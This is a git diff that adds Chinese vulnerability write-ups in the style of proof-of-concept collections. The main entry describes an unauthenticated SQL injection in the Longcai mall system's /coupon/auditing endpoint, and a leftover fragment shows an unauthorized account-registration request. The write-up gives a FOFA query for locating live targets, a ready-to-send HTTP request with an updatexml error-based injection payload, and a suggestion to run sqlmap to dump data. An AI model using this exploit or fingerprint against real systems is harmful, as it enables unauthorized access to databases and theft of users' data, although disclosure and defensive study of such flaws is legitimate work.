+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 116
+
+phone=15712341234&password=123456ys&confirm_password=123456ys&add_money=&add_integral=&sex=1&status=1&usable_money=0
+```
+
+![1715915618660-8321c8a1-17ab-4bd2-b842-18e3f63fd5bf.jpeg](./img/ye2mTZUMWNMKHS1X/1715915618660-8321c8a1-17ab-4bd2-b842-18e3f63fd5bf-342096.jpeg)
+
+成功登录![1715915626466-79d25afd-a7ea-4f99-97f7-ee600b1468c6.jpeg](./img/ye2mTZUMWNMKHS1X/1715915626466-79d25afd-a7ea-4f99-97f7-ee600b1468c6-903320.jpeg)![1715915629687-e26c8582-fde8-470b-a967-edc217770e10.jpeg](./img/ye2mTZUMWNMKHS1X/1715915629687-e26c8582-fde8-470b-a967-edc217770e10-933378.jpeg)
+
+
+
+> 更新: 2024-06-01 11:14:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ghwoi5bmulblbabu>
\ No newline at end of file
diff --git a/龙采商城系统新人礼包权限开关处存在未授权SQL注入.md b/龙采商城系统新人礼包权限开关处存在未授权SQL注入.md
new file mode 100644
index 0000000..b3954fc
--- /dev/null
+++ b/龙采商城系统新人礼包权限开关处存在未授权SQL注入.md
@@ -0,0 +1,41 @@
+# 龙采商城系统新人礼包权限开关处存在未授权SQL注入
+
+### 一、漏洞描述
+龙采科技集团有限责任公司龙采商城系统新人礼包权限开关处存在未授权SQL注入，可直接无需登录后台即可暴露出数据库敏感信息。
+
+### 二、影响版本
+龙采商城系统
+
+### 三、资产测绘
+FOFA：body="'url':'/pc2.0/index/index'"
+
+界面框架大致如下：
+
+![1715913715272-6b2b1541-925a-4122-a1c1-739f56e008d1.png](./img/-LguuObqFJEiyiS4/1715913715272-6b2b1541-925a-4122-a1c1-739f56e008d1-967924.png)
+
+### 四、漏洞复现
+```plain
+POST /coupon/auditing HTTP/1.1
+Host: xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 60
+Connection: close
+
+id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)
+
+
+```
+
+使用burp请求POC即可暴出敏感数据库（也可以采用sqlmap跑出大量敏感信息）
+
+![1715913259926-c5a808ea-5281-4129-abb9-f358ef824dab.png](./img/-LguuObqFJEiyiS4/1715913259926-c5a808ea-5281-4129-abb9-f358ef824dab-585388.png)
+
+
+
+> 更新: 2024-06-01 11:14:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ohz4lxse6x8dctsn>
\ No newline at end of file